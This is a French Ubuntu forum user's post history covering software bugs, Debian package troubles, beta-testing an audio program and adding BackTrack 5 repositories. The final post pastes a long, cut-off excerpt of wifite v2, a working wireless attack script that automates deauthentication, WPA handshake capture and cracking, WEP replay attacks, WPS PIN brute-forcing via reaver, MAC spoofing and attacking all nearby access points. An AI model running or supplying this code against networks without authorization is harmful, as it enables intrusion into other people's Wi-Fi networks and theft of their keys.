Contenu | Rechercher | Menus

Annonce

Si vous rencontrez des soucis à rester connecté sur le forum (ou si vous avez perdu votre mot de passe) déconnectez-vous et reconnectez-vous depuis cette page, en cochant la case "Me connecter automatiquement lors de mes prochaines visites". Attention, le forum rencontre actuellement quelques difficultés. En cas d'erreur 502, il ne faut pas re-valider l'envoi d'un message ou l'ouverture d'une discussion, au risque de créer un doublon.

La section divers se réorganise ! De nouvelles sous-sections à venir. (plus d'infos + donner son avis)

nombre réponses : 25

#0 Re : -1 »  TVDownloader: télécharger les médias du net ! » Le 04/03/2011, à 22:18

coyote-mania
Réponses : 2858

oui j'aurais une question: est ce que vous pourriez faire un script pour TF1 ?
merci big_smile

#1 Re : -1 »  Post it : un mémo de bureau simple et léger ! » Le 06/02/2011, à 19:14

coyote-mania
Réponses : 29

merci, pour ce programme vraiment sympa et utile, je vais le tester et si je trouve des erreur je te tiens au courant wink

#2 Re : -1 »  Post it : un mémo de bureau simple et léger ! » Le 08/02/2011, à 20:57

coyote-mania
Réponses : 29

pour moi aussi il un message d'erreur ( le même que Arnaud04 ), même en y installant le .zip bien j'ai le même message, cela ne serais pas dû a JAVA ?

#3 Re : -1 »  Post it : un mémo de bureau simple et léger ! » Le 14/02/2011, à 20:15

coyote-mania
Réponses : 29

je suis un noobs en sa, je fait le ls où
et le Java PostIt où ?
Merci roll

#4 Re : -1 »  Post it : un mémo de bureau simple et léger ! » Le 19/02/2011, à 11:39

coyote-mania
Réponses : 29

je l'ai tester sur un autre PC, et il marche !!
Merci pour ce programme bien pratique, j'en parlerais sur mon blog, je mettrais le lien du post dès qu'il sera en ligne !!

#5 -1 »  Problème lors de l'installation de Chromium avec Debian » Le 22/09/2012, à 18:32

coyote-mania
Réponses : 1

Bonsoir,
J'ai recément installé Debian (stable) sur ma machine et j'ai voulu installer Chromium via Synaptic mais je me suis aperçu qu'il n'y avait que la version 6 disponible alors j'ai pris le .deb de la version 21. Mais lorsque je veux l'installer via Gedi voilà ce que je reçois comme message d'erreur:

Erreur : Dependency is not satisfiable: chromium (>= 10)

J'aimerais savoir d'où vient le problème et comment le résoudre. Merci big_smile

#6 Re : -1 »  [résolu] Cherche testeur logiciel audio, effet 4D » Le 25/05/2011, à 19:55

coyote-mania
Réponses : 42

je suis partant pour les phases de tests, je suis un peu débutant sur tous ce qui est test en ligne de commande, mais bon ...
En me rendant sur ton site, j'ai vue qu'il y avait plusieurs lien à télécharger, je les ai tous pris (ne savant pas lequel il fallais prendre) et je vais les exécuté comme tu l'à montré.
Mais après je vais m'attendre à quoi ? une interface graphique ou le programme ne mode console ? Bref de toute façon j'ai vue que tu avais mis une vidéo sur youtube donc je vais la téléchargé et je la regarderais quand j'en aurais le temps wink

J te dirais des nouvelles de mes tests !!!

#7 Re : -1 »  [résolu] Cherche testeur logiciel audio, effet 4D » Le 31/05/2011, à 19:16

coyote-mania
Réponses : 42

je n'ai pas trop compris mais bon ...
Si j'ai bien compris la version "v2-wav-mono-ASCII" sert à créer les voix, la version "v2-aiff-8bits-ASCII" celle qui vas générer les voix enfin celle qui vas calculer les opérations pour réaliser les voix et la " v4-2sens-bin" sert elle à compresser le fichier audio, non ?

Bref je m'excuse du retard mais mon week-end  était assez chargé donc je n'est pas trop eu le temps de répondre.

Bon je sais que tu vas trouver ça idiot mais lorsque lance le programme cela me met "permission non accordé" mais sur l'un des trois exécutable je lance la ligne de commande et rien ne ce passe (se qui pour moi veux dire que l'opération c'est faites sans erreur).
Ensuite lorsque sur les deux autres exécutables, je me suis identifié comme super-utilisateur (sudo) mais c'est toujours pareil: "permission non accordé"

Bon voili voilou, j'aurais une question, est-ce que au final le programme sera en mode graphique ?


P.S: question qui n'a rien à voir, mais est-ce que tu t'est rendu à la Ubuntu Party ?

#8 Re : -1 »  [résolu] Cherche testeur logiciel audio, effet 4D » Le 16/06/2011, à 18:06

coyote-mania
Réponses : 42

désolé du grand retard mais c'est la fin d'année donc j'ai assez de travail à faire et maintenant l’accès à internet est plus dur, mais durant les vacances je serais plus libre.
Donc j'ai testé brièvement les versions graphiques que tu a mis à disposition sur ton site.
J'ai déjà testé SDL, je n'ai pas trop compris, mais bon ...
Pour moi dans ce projet, je suis surtout intéresser par la partie "voix de synthèse" donc j'ai aussi pris sa version et graphique et je l'ai plus "utilisé".
J'ai fais jouer pas mal de son. J'en suis arrivé à plusieurs remarques:
L'interface graphique est super bien, surtout pour moi qui m'y connais pas trop en onde sonore
Mais je ne sais pas si c'est ma carte Son mais j'ai vraiment du mal à entendre les sons, il y a beaucoup trop de grésillement et j'ai du mal à entendre les sons, mais j'arrive tout de même à les reconnaître.


Et sinon est-ce que tu aurais un enregistrement de ton passage à la radio ?
Sinon continuons à nous contacter via les mails, car je suis plus actif sur ma boite mail que sur le forum.

#9 -1 »  Ajouter les dêpots de Backtrack 5 dans Ubuntu » Le 03/03/2012, à 15:46

coyote-mania
Réponses : 6

Bonjour,
Voilà je me suis remis sous Ubuntu, et je suis un peu déçue de la dérnière version 11.10 car elle n'as plus synaptic par défaut.
Je trouve également que j'ai plus de mal à ajouté des dêpots (c'est peut être moi qui à du mal à me remettre sur Ubuntu ^^)
Bref, le problème n'est pas là. J'ai voulu ajouter les dêpots de Backtrack 5 dans ma logithèque via le tutoriel suivant mais sa ne fonctionne pas:
Voici le lien du tutoriel :dans synaptic il me demande la ligne APT alors que je n'ai pas le dépot APT.
Et lorsque je bveux le faire en ligne de commande il me renvoie l'erreur:


root@coyote-mania:~# echo deb http://all.repository.backtrack-linux.org revolution main microverse non-free testing >> /etc/apt/sources.list
bash: Erreur de syntaxe près du symbole inattendu « ;& »

Commente est-ce que je peux faire ?

Merci.

#10 Re : -1 »  Ajouter les dêpots de Backtrack 5 dans Ubuntu » Le 03/03/2012, à 17:24

coyote-mania
Réponses : 6

Siap, oui j'avais déjà installé Synaptic (il me manquait tellement ^^)
Sinon merci f.x0 ça fonctionne !

Merci !

#11 Re : -1 »  Ajouter les dêpots de Backtrack 5 dans Ubuntu » Le 03/03/2012, à 19:22

coyote-mania
Réponses : 6

Oui c'est pas t'en fait pas.
En faites aircrack -ng ne me plaisait pas donc j'ai pris un scrpit python qui reprenait le même genre de truc mais en mieux:


 #!/usr/bin/python

# -*- coding: utf-8 -*-

"""
    wifite
    
    author: derv82 at gmail
    
    Licensed under the GNU General Public License Version 2 (GNU GPL v2), 
        available at: http://www.gnu.org/licenses/gpl-2.0.txt
    
    (C) 2011 Derv Merkler

    -----------------

    TODO:
    
    ignore root check when -cracked (afterward) (need root for -check?)
    "cracked*" in list of AP's
    
    Restore same command-line switch names from v1
    
    If device already in monitor mode, check for and, if applicable, use macchanger
    
     WPS
     * Mention reaver automatically resumes sessions
     * Warning about length of time required for WPS attack (*hours*)
     * Show time since last successful attempt
     * Percentage of tries/attempts ?
     * Update code to work with reaver 1.4 ("x" sec/att)

     WEP:
     * ability to pause/skip/continue     
     * Option to capture only IVS packets (uses --output-format ivs,csv)
       - not compatible on older aircrack-ng's.
           - Just run "airodump-ng --output-format ivs,csv", "No interface specified" = works
         - would cut down on size of saved .caps
     
     reaver:
          MONITOR ACTIVITY!
          - Enter ESSID when executing (?)
       - Ensure WPS key attempts have begun. 
       - If no attempts can be made, stop attack
       
       - During attack, if no attempts are made within X minutes, stop attack & Print
       
       - Reaver's output when unable to associate:
         [!] WARNING: Failed to associate with AA:BB:CC:DD:EE:FF (ESSID: ABCDEF)
       - If failed to associate for x minutes, stop attack (same as no attempts?)
    
    MIGHTDO:
      * WPA - crack (pyrit/cowpatty) (not really important)
      * Test injection at startup? (skippable via command-line switch)
     
"""


#############
# LIBRARIES #
#############

import os     # File management
import time   # Measuring attack intervals
import random # Generating a random MAC address.
import errno  # Error numbers

from sys import argv          # Command-line arguments
from sys import stdout, stdin # Flushing

from shutil import copy # Copying .cap files

# Executing, communicating with, killing processes
from subprocess import Popen, call, PIPE
from signal import SIGINT, SIGTERM

import re # RegEx, Converting SSID to filename




################################
# GLOBAL VARIABLES IN ALL CAPS #
################################

REVISION = 85;


# WPA variables
WPA_DISABLE          = False # Flag to skip WPA handshake capture
WPA_STRIP_HANDSHAKE  = True  # Use pyrit or tshark (if applicable) to strip handshake
WPA_DEAUTH_TIMEOUT   = 10    # Time to wait between deauthentication bursts (in seconds)
WPA_ATTACK_TIMEOUT   = 500   # Total time to allow for a handshake attack (in seconds)
WPA_HANDSHAKE_DIR    = 'hs'  # Directory in which handshakes .cap files are stored
# Strip file path separator if needed
if WPA_HANDSHAKE_DIR != '' and WPA_HANDSHAKE_DIR[-1] == os.sep: 
    WPA_HANDSHAKE_DIR = WPA_HANDSHAKE_DIR[:-1]

WPA_FINDINGS         = []    # List of strings containing info on successful WPA attacks
WPA_DONT_CRACK       = False # Flag to skip cracking of handshakes
WPA_DICTIONARY       = '/pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt'
if not os.path.exists(WPA_DICTIONARY): WPA_DICTIONARY = ''

# Various programs to use when checking for a four-way handshake.
# True means the program must find a valid handshake in order for wifite to recognize a handshake.
# Not finding handshake short circuits result (ALL 'True' programs must find handshake)
WPA_HANDSHAKE_TSHARK   = True  # Checks for sequential 1,2,3 EAPOL msg packets (ignores 4th)
WPA_HANDSHAKE_PYRIT    = False # Sometimes crashes on incomplete dumps, but accurate.
WPA_HANDSHAKE_AIRCRACK = True  # Not 100% accurate, but fast.
WPA_HANDSHAKE_COWPATTY = False # Uses more lenient "nonstrict mode" (-2)



# WEP variables
WEP_DISABLE         = False # Flag for ignoring WEP networks
WEP_PPS             = 600   # packets per second (Tx rate)
WEP_TIMEOUT         = 600   # Amount of time to give each attack
WEP_ARP_REPLAY      = True  # Various WEP-based attacks via aireplay-ng
WEP_CHOPCHOP        = True  #
WEP_FRAGMENT        = True  #
WEP_CAFFELATTE      = True  #
WEP_P0841           = True
WEP_HIRTE           = True
WEP_CRACK_AT_IVS    = 10000 # Number of IVS at which we start cracking
WEP_IGNORE_FAKEAUTH = True  # When True, continues attack despite fake authentication failure
WEP_FINDINGS        = []    # List of strings containing info on successful WEP attacks.
WEP_SAVE            = False # Save packets.

# WPS variables
WPS_DISABLE         = False # Flag to skip WPS scan and attacks
WPS_FINDINGS        = []    # List of (successful) results of WPS attacks
WPS_TIMEOUT         = 300   # Time to wait (in seconds) for successful PIN attempt
WPS_RATIO_THRESHOLD = 0.01  # Lowest percentage of tries/attempts allowed (where tries > 0)
WPS_MAX_RETRIES     = 0     # Number of times to re-try the same pin before giving up completely.


# Program variables
WIRELESS_IFACE     = ''    # User-defined interface
TARGET_CHANNEL     = 0     # User-defined channel to scan on
TARGET_ESSID       = ''    # User-defined ESSID of specific target to attack
TARGET_BSSID       = ''    # User-defined BSSID of specific target to attack
IFACE_TO_TAKE_DOWN = ''    # Interface that wifite puts into monitor mode
                           # It's our job to put it out of monitor mode after the attacks
ORIGINAL_IFACE_MAC = ('', '') # Original interface name[0] and MAC address[1] (before spoofing)
DO_NOT_CHANGE_MAC  = True  # Flag for disabling MAC anonymizer
TARGETS_REMAINING  = 0     # Number of access points remaining to attack
WPA_CAPS_TO_CRACK  = []    # list of .cap files to crack (full of CapFile objects)
THIS_MAC           = ''    # The interfaces current MAC address.
SHOW_MAC_IN_SCAN   = False # Display MACs of the SSIDs in the list of targets
CRACKED_TARGETS    = []    # List of targets we have already cracked
ATTACK_ALL_TARGETS = False # Flag for when we want to attack *everyone*
ATTACK_MIN_POWER   = 0     # Minimum power (dB) for access point to be considered a target
VERBOSE_APS        = True  # Print access points as they appear

# Console colors
W  = '\033[0m'  # white (normal)
R  = '\033[31m' # red
G  = '\033[32m' # green
O  = '\033[33m' # orange
B  = '\033[34m' # blue
P  = '\033[35m' # purple
C  = '\033[36m' # cyan
GR = '\033[37m' # gray


if os.getuid() != 0:
    print R+' [!]'+O+' ERROR:'+G+' wifite'+O+' must be run as '+R+'root'+W
    print R+' [!]'+O+' login as root ('+W+'su root'+O+') or try '+W+'sudo ./wifite.py'+W
    exit(1)

if not os.uname()[0].startswith("Linux"):
    print O+' [!]'+R+' WARNING:'+G+' wifite'+W+' must be run on '+O+'linux'+W
    exit(1)


# Create temporary directory to work in
from tempfile import mkdtemp
temp = mkdtemp(prefix='wifite')
if not temp.endswith(os.sep):
    temp += os.sep

# /dev/null, send output from programs so they don't print to screen.
DN = open(os.devnull, 'w')





###################
# DATA STRUCTURES #
###################

class CapFile:
    """
        Holds data about an access point's .cap file, including AP's ESSID & BSSID.
    """
    def __init__(self, filename, ssid, bssid):
        self.filename = filename
        self.ssid = ssid
        self.bssid = bssid

class Target:
    """
        Holds data for a Target (aka Access Point aka Router)
    """
    def __init__(self, bssid, power, data, channel, encryption, ssid):
        self.bssid = bssid
        self.power = power
        self.data  = data
        self.channel = channel
        self.encryption = encryption
        self.ssid = ssid
        self.wps = False # Default to non-WPS-enabled router.
        self.key = ''

class Client:
    """
        Holds data for a Client (device connected to Access Point/Router)
    """
    def __init__(self, bssid, station, power):
        self.bssid   = bssid
        self.station = station
        self.power   = power









##################
# MAIN FUNCTIONS #
##################


def main():
    """
        Where the magic happens.
    """
    global TARGETS_REMAINING, THIS_MAC, CRACKED_TARGETS

    CRACKED_TARGETS = load_cracked() # Load previously-cracked APs from file

    handle_args() # Parse args from command line, set global variables.

    initial_check() # Ensure required programs are installed.

    # The "get_iface" method anonymizes the MAC address (if needed)
    # and puts the interface into monitor mode.
    iface = get_iface()

    THIS_MAC = get_mac_address(iface) # Store current MAC address

    (targets, clients) = scan(iface=iface, channel=TARGET_CHANNEL)

    try:
        index = 0
        while index < len(targets):
            target = targets[index]
            # Check if we have already cracked this target
            for already in CRACKED_TARGETS:
                if already.bssid == targets[index].bssid:
                    print R+'\n [!]'+O+' you have already cracked this access point\'s key!'+W
                    print R+' [!] %s' % (C+already.ssid+W+': "'+G+already.key+W+'"')
                    ri = raw_input(GR+' [+] '+W+'do you want to crack this access point again? ('+G+'y/'+O+'n'+W+'): ')
                    if ri.lower() == 'n':
                        targets.pop(index)
                        index -= 1
                    break

            # Check if handshakes already exist, ask user whether to skip targets or save new handshakes
            handshake_file = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
                             + '_' + target.bssid.replace(':', '-') + '.cap'
            if os.path.exists(handshake_file):
                print R+'\n [!] '+O+'you already have a handshake file for %s:' % (C+target.ssid+W)
                print '        %s\n' % (G+handshake_file+W)
                print GR+' [+]'+W+' do you want to '+G+'[s]kip'+W+', '+O+'[c]apture again'+W+', or '+R+'[o]verwrite'+W+'?'
                ri = 'x'
                while ri != 's' and ri != 'c' and ri != 'o': 
                    ri = raw_input(GR+' [+] '+W+'enter '+G+'s'+W+', '+O+'c,'+W+' or '+R+'o'+W+': '+G).lower()
                print W+"\b",
                if ri == 's': 
                    targets.pop(index)
                    index -= 1
                elif ri == 'o': 
                    remove_file(handshake_file)
                    continue
            index += 1


    except KeyboardInterrupt:
        print '\n '+R+'(^C)'+O+' interrupted\n'
        exit_gracefully(0)

    wpa_success = 0
    wep_success = 0
    wpa_total   = 0
    wep_total   = 0

    TARGETS_REMAINING = len(targets)
    for t in targets:
        TARGETS_REMAINING -= 1

        # Build list of clients connected to target
        ts_clients = []
        for c in clients:
            if c.station == t.bssid:
                ts_clients.append(c)

        print ''
        if t.encryption.find('WPA') != -1:
            need_handshake = True
            if not WPS_DISABLE and t.wps:
                need_handshake = not wps_attack(iface, t)
                wpa_total += 1

            if not need_handshake: wpa_success += 1
            if TARGETS_REMAINING < 0: break

            if not WPA_DISABLE and need_handshake:
                wpa_total += 1
                if wpa_get_handshake(iface, t, ts_clients):
                    wpa_success += 1

        elif t.encryption.find('WEP') != -1:
            wep_total += 1
            if attack_wep(iface, t, ts_clients):
                wep_success += 1

        else: print R+' unknown encryption:',t.encryption,W

        # If user wants to stop attacking
        if TARGETS_REMAINING <= 0: break

    if wpa_total + wep_total > 0:
        # Attacks are done! Show results to user
        print ''
        print GR+' [+] %s%d attack%s completed:%s' % (G, wpa_total + wep_total, '' if wpa_total+wep_total == 1 else 's', W)
        print ''
        if wpa_total > 0:
            if wpa_success == 0:           print GR+' [+]'+R,
            elif wpa_success == wpa_total: print GR+' [+]'+G,
            else:                          print GR+' [+]'+O,
            print '%d/%d%s WPA attacks succeeded' % (wpa_success, wpa_total, W)

            for finding in WPA_FINDINGS:
                print '        ' + C+finding+W

        if wep_total > 0:
            if wep_success == 0:           print GR+' [+]'+R,
            elif wep_success == wep_total: print GR+' [+]'+G,
            else:                          print GR+' [+]'+O,
            print '%d/%d%s WEP attacks succeeded' % (wep_success, wep_total, W)

            for finding in WEP_FINDINGS:
                print '        ' + C+finding+W

        caps = len(WPA_CAPS_TO_CRACK)
        if caps > 0 and not WPA_DONT_CRACK:
            print GR+' [+]'+W+' starting '+G+'WPA cracker'+W+' on %s%d handshake%s' % (G, caps, W if caps == 1 else 's'+W)
            for cap in WPA_CAPS_TO_CRACK:
                wpa_crack(cap)

    print ''
    exit_gracefully(0)

def rename(old, new):
    """
        Renames file 'old' to 'new', works with separate partitions.
        Thanks to hannan.sadar
    """
    try:
        os.rename(old, new)
    except os.error, detail:
        if detail.errno == errno.EXDEV:
            try:
                copy(old, new)
            except:
                os.unlink(new)
                raise
                os.unlink(old)
        # if desired, deal with other errors
        else:
            raise


def initial_check():
    """
        Ensures required programs are installed.
    """
    global WPS_DISABLE
    airs = ['aircrack-ng', 'airodump-ng', 'aireplay-ng', 'airmon-ng', 'packetforge-ng']
    for air in airs:
        if program_exists(air): continue
        print R+' [!]'+O+' required program not found: %s' % (R+air+W)
        print R+' [!]'+O+' this program is bundled with the aircrack-ng suite:'+W
        print R+' [!]'+O+'        '+C+'http://www.aircrack-ng.org/'+W
        print R+' [!]'+O+' or: '+W+'sudo apt-get install aircrack-ng\n'+W
        exit_gracefully(1)

    if not program_exists('iw'):
        print R+' [!]'+O+' airmon-ng requires the program %s\n' % (R+'iw'+W)
        exit_gracefully(1)

    printed = False
    # Check reaver
    if not program_exists('reaver'):
        printed = True
        print R+' [!]'+O+' the program '+R+'reaver'+O+' is required for WPS attacks'+W
        print R+'    '+O+'   available at '+C+'http://code.google.com/p/reaver-wps'+W
        WPS_DISABLE = True
    elif not program_exists('walsh') and not program_exists('wash'):
        printed = True
        print R+' [!]'+O+' reaver\'s scanning tool '+R+'walsh'+O+' (or '+R+'wash'+O+') was not found'+W
        print R+' [!]'+O+' please re-install reaver or install walsh/wash separately'+W

    # Check handshake-checking apps
    recs = ['tshark', 'pyrit', 'cowpatty']
    for rec in recs:
        if program_exists(rec): continue
        printed = True
        print R+' [!]'+O+' the program %s is not required, but is recommended%s' % (R+rec+O, W)
    if printed: print ''    


def handle_args():
    """
        Handles command-line arguments, sets global variables.
    """
    global WIRELESS_IFACE, TARGET_CHANNEL, DO_NOT_CHANGE_MAC, TARGET_ESSID, TARGET_BSSID
    global WPA_DISABLE, WPA_STRIP_HANDSHAKE, WPA_DEAUTH_TIMEOUT, WPA_ATTACK_TIMEOUT
    global WPA_DONT_CRACK, WPA_DICTIONARY, WPA_HANDSHAKE_TSHARK, WPA_HANDSHAKE_PYRIT
    global WPA_HANDSHAKE_AIRCRACK, WPA_HANDSHAKE_COWPATTY
    global WEP_DISABLE, WEP_PPS, WEP_TIMEOUT, WEP_ARP_REPLAY, WEP_CHOPCHOP, WEP_FRAGMENT
    global WEP_CAFFELATTE, WEP_P0841, WEP_HIRTE, WEP_CRACK_AT_IVS, WEP_IGNORE_FAKEAUTH
    global WEP_SAVE, SHOW_MAC_IN_SCAN, ATTACK_ALL_TARGETS, ATTACK_MIN_POWER
    global WPS_DISABLE, WPS_TIMEOUT, WPS_RATIO_THRESHOLD, WPS_MAX_RETRIES
    global VERBOSE_APS

    args = argv[1:]
    if args.count('-h') + args.count('--help') + args.count('?') + args.count('-help') > 0:
        help()
        exit_gracefully(0)

    set_encrypt = False
    set_hscheck = False
    set_wep     = False
    capfile     = ''  # Filename of .cap file to analyze for handshakes

    try:
        for i in xrange(0, len(args)):

            if not set_encrypt and (args[i] == '-wpa' or args[i] == '-wep' or args[i] == '-wps'):
                WPS_DISABLE = True
                WPA_DISABLE = True
                WEP_DISABLE = True
                set_encrypt = True
            if   args[i] == '-wpa': 
                print GR+' [+]'+W+' targeting '+G+'WPA'+W+' encrypted networks (use '+G+'-wps'+W+' for WPS scan)'
                WPA_DISABLE = False
            elif args[i] == '-wep': 
                print GR+' [+]'+W+' targeting '+G+'WEP'+W+' encrypted networks'
                WEP_DISABLE = False
            elif args[i] == '-wps': 
                print GR+' [+]'+W+' targeting '+G+'WPS-enabled'+W+' networks'
                WPS_DISABLE = False

            elif args[i] == '-c':
                i += 1
                try: TARGET_CHANNEL = int(args[i])
                except ValueError: print O+' [!]'+R+' invalid channel: '+O+args[i]+W
                except IndexError: print O+' [!]'+R+' no channel given!'+W
                else: print GR+' [+]'+W+' channel set to %s' % (G+args[i]+W)
            elif args[i] == '-mac':
                print GR+' [+]'+W+' mac address anonymizing '+G+'enabled'+W
                print O+'     note: only works if device is not already in monitor mode!'+W
                DO_NOT_CHANGE_MAC = False
            elif args[i] == '-i':
                i += 1
                WIRELESS_IFACE = args[i]
                print GR+' [+]'+W+' set interface: %s' % (G+args[i]+W)
            elif args[i] == '-e':
                i += 1
                try: TARGET_ESSID = args[i]
                except ValueError: print R+' [!]'+O+' no ESSID given!'+W
                else: print GR+' [+]'+W+' targeting ESSID "%s"' % (G+args[i]+W)
            elif args[i] == '-b':
                i += 1
                try: TARGET_BSSID = args[i]
                except ValueError: print R+' [!]'+O+' no BSSID given!'+W
                else: print GR+' [+]'+W+' targeting BSSID "%s"' % (G+args[i]+W)
            elif args[i] == '-showb' or args[i] == '-showbssid':
                SHOW_MAC_IN_SCAN = True
                print GR+' [+]'+W+' target MAC address viewing '+G+'enabled'+W
            elif args[i] == '-all' or args[i] == '-hax0ritna0':
                print GR+' [+]'+W+' targeting '+G+'all access points'+W
                ATTACK_ALL_TARGETS = True
            elif args[i] == '-pow' or args[i] == '-power':
                i += 1
                try:
                    ATTACK_MIN_POWER = int(args[i])
                except ValueError: print R+' [!]'+O+' invalid power level: %s' % (R+args[i]+W)
                except IndexError: print R+' [!]'+O+' no power level given!'+W
                else: print GR+' [+]'+W+' minimum target power set to %s' % (G+args[i] + "dB"+W)
            elif args[i] == '-q' or args[i] == '-quiet':
                VERBOSE_APS = False
                print GR+' [+]'+W+' list of APs during scan '+O+'disabled'+W

            elif args[i] == '-check':
                i += 1
                try: capfile = args[i]
                except IndexError:
                    print R+' [!]'+O+' unable to analyze capture file'+W 
                    print R+' [!]'+O+' no cap file given!\n'+W
                    exit_gracefully(1)
                else: 
                    if not os.path.exists(capfile): 
                        print R+' [!]'+O+' unable to analyze capture file!'+W
                        print R+' [!]'+O+' file not found: '+R+capfile+'\n'+W
                        exit_gracefully(1)

            elif args[i] == '-cracked':
                if len(CRACKED_TARGETS) == 0:
                    print R+' [!]'+O+' there are not cracked access points saved to '+R+'cracked.txt\n'+W
                    exit_gracefully(1)
                print GR+' [+]'+W+' '+W+'previously cracked access points'+W+':'
                for victim in CRACKED_TARGETS:
                    print '     %s (%s) : "%s"' % (C+victim.ssid+W, C+victim.bssid+W, G+victim.key+W)
                print ''
                exit_gracefully(0)


            # WPA
            if not set_hscheck and (args[i] == '-tshark' or args[i] == '-cowpatty' or args[i] == '-aircrack' or args[i] == 'pyrit'):
                WPA_HANDSHAKE_TSHARK   = False
                WPA_HANDSHAKE_PYRIT    = False
                WPA_HANDSHAKE_COWPATTY = False
                WPA_HANDSHAKE_AIRCRACK = False
                set_hscheck = True
            elif args[i] == '-strip':
                WPA_STRIP_HANDSHAKE = True
                print GR+' [+]'+W+' handshake stripping '+G+'enabled'+W
            elif args[i] == '-wpadt':
                i += 1
                WPA_DEAUTH_TIMEOUT = int(args[i])
                print GR+' [+]'+W+' WPA deauth timeout set to %s' % (G+args[i]+' seconds'+W)
            elif args[i] == '-wpat':
                i += 1
                WPA_ATTACK_TIMEOUT = int(args[i])
                print GR+' [+]'+W+' WPA attack timeout set to %s' % (G+args[i]+' seconds'+W)
            elif args[i] == '-crack':
                WPA_DONT_CRACK = False
                print GR+' [+]'+W+' WPA cracking '+G+'enabled'+W
            elif args[i] == '-dict':
                i += 1
                try:
                    WPA_DICTIONARY = args[i]
                except IndexError: print R+' [!]'+O+' no WPA dictionary given!'
                else:
                    if os.path.exists(args[i]):
                        print GR+' [+]'+W+' WPA dictionary set to %s' % (G+args[i]+W)
                    else:
                        print R+' [!]'+O+' WPA dictionary file not found: %s' % (args[i])
            if args[i] == '-tshark':
                WPA_HANDSHAKE_TSHARK = True
                print GR+' [+]'+W+' tshark handshake verification '+G+'enabled'+W
            if args[i] == '-pyrit':
                WPA_HANDSHAKE_PYRIT = True
                print GR+' [+]'+W+' pyrit handshake verification '+G+'enabled'+W
            if args[i] == '-aircrack':
                WPA_HANDSHAKE_AIRCRACK = True
                print GR+' [+]'+W+' aircrack handshake verification '+G+'enabled'+W
            if args[i] == '-cowpatty':
                WPA_HANDSHAKE_COWPATTY = True
                print GR+' [+]'+W+' cowpatty handshake verification '+G+'enabled'+W

            # WEP
            if not set_wep and args[i] == '-chopchop' or args[i] == 'fragment' or \
                               args[i] == 'caffelatte' or args[i] == '-arpreplay' or \
                               args[i] == '-p0841' or args[i] == '-hirte':
                WEP_CHOPCHOP   = False
                WEP_ARPREPLAY  = False
                WEP_CAFFELATTE = False
                WEP_FRAGMENT   = False
                WEP_P0841      = False
                WEP_HIRTE      = False
            if args[i] == '-chopchop': 
                print GR+' [+]'+W+' WEP chop-chop attack '+G+'enabled'+W
                WEP_CHOPCHOP = True
            if args[i] == '-fragment' or args[i] == '-frag' or args[i] == '-fragmentation':
                print GR+' [+]'+W+' WEP fragmentation attack '+G+'enabled'+W
                WEP_FRAGMENT = True
            if args[i] == '-caffelatte': 
                print GR+' [+]'+W+' WEP caffe-latte attack '+G+'enabled'+W
                WEP_CAFFELATTE = True
            if args[i] == '-arpreplay': 
                print GR+' [+]'+W+' WEP arp-replay attack '+G+'enabled'+W
                WEP_ARPREPLAY = True
            if args[i] == '-p0841': 
                print GR+' [+]'+W+' WEP p0841 attack '+G+'enabled'+W
                WEP_P0841 = True
            if args[i] == '-hirte': 
                print GR+' [+]'+W+' WEP hirte attack '+G+'enabled'+W
                WEP_HIRTE = True
            if args[i] == '-nofake': 
                print GR+' [+]'+W+' ignoring failed fake-authentication '+R+'disabled'+W
                WEP_IGNORE_FAKEAUTH = False
            if args[i] == '-wept' or args[i] == '-weptime':
                i += 1
                try:
                    WEP_TIMEOUT = int(args[i])
                except ValueError: print R+' [!]'+O+' invalid timeout: %s' % (R+args[i]+W)
                except IndexError: print R+' [!]'+O+' no timeout given!'+W
                else: print GR+' [+]'+W+' WEP attack timeout set to %s' % (G+args[i] + " seconds"+W)
            if args[i] == '-pps':
                i += 1
                try:
                    WEP_PPS = int(args[i])
                except ValueError: print R+' [!]'+O+' invalid value: %s' % (R+args[i]+W)
                except IndexError: print R+' [!]'+O+' no value given!'+W
                else: print GR+' [+]'+W+' packets-per-second rate set to %s' % (G+args[i] + " packets/sec"+W)
            if args[i] == '-save' or args[i] == '-wepsave':
                WEP_SAVE = True
                print GR+' [+]'+W+' WEP .cap file saving '+G+'enabled'+W


            # WPS
            if args[i] == '-wpst' or args[i] == '-wpstime':
                i += 1
                try:
                    WPS_TIMEOUT = int(args[i])
                except ValueError: print R+' [!]'+O+' invalid timeout: %s' % (R+args[i]+W)
                except IndexError: print R+' [!]'+O+' no timeout given!'+W
                else: print GR+' [+]'+W+' WPS attack timeout set to %s' % (G+args[i] + " seconds"+W)
            if args[i] == '-wpsratio' or args[i] == 'wpsr':
                i += 1
                try:
                    WPS_RATIO_THRESHOLD = float(args[i])
                except ValueError: print R+' [!]'+O+' invalid percentage: %s' % (R+args[i]+W)
                except IndexError: print R+' [!]'+O+' no ratio given!'+W
                else: print GR+' [+]'+W+' minimum WPS tries/attempts threshold set to %s' % (G+args[i] + ""+W)
            if args[i] == '-wpsmaxr' or args[i] == '-wpsretry':
                i += 1
                try:
                    WPS_MAX_RETRIES = int(args[i])
                except ValueError: print R+' [!]'+O+' invalid number: %s' % (R+args[i]+W)
                except IndexError: print R+' [!]'+O+' no number given!'+W
                else: print GR+' [+]'+W+' WPS maximum retries set to %s' % (G+args[i] + " retries"+W)

    except IndexError:
        print '\nindexerror\n\n'

    if capfile != '':
        analyze_capfile(capfile)
    print ''

def banner():
    """ 
        Displays ASCII art of the highest caliber.
    """
    global REVISION
    print ''
    print G+"  .;'                     `;,    "
    print G+" .;'  ,;'             `;,  `;,   "+W+"WiFite v2 BETA8" # r"+str(REVISION)
    print G+".;'  ,;'  ,;'     `;,  `;,  `;,  "
    print G+"::   ::   :   "+GR+"( )"+G+"   :   ::   ::  "+GR+"automated wireless auditor"
    print G+"':.  ':.  ':. "+GR+"/_\\"+G+" ,:'  ,:'  ,:'  "
    print G+" ':.  ':.    "+GR+"/___\\"+G+"    ,:'  ,:'   "+GR+"designed for Linux"
    print G+"  ':.       "+GR+"/_____\\"+G+"      ,:'     "
    print G+"           "+GR+"/       \\"+G+"             "
    print W    


def help():
    """
        Prints help screen
    """

    head    = W
    sw      = G
    var     = GR
    des     = W
    de      = G

    print head+'   COMMANDS'+W
    print sw+'\t-check '+var+'<file>\t'+des+'check capfile '+var+'<file>'+des+' for handshakes.'+W
    print sw+'\t-cracked    \t'+des+'display previously-cracked access points'+W
    print ''

    print head+'   GLOBAL'+W
    print sw+'\t-all         \t'+des+'attack all targets.              '+de+'[off]'+W
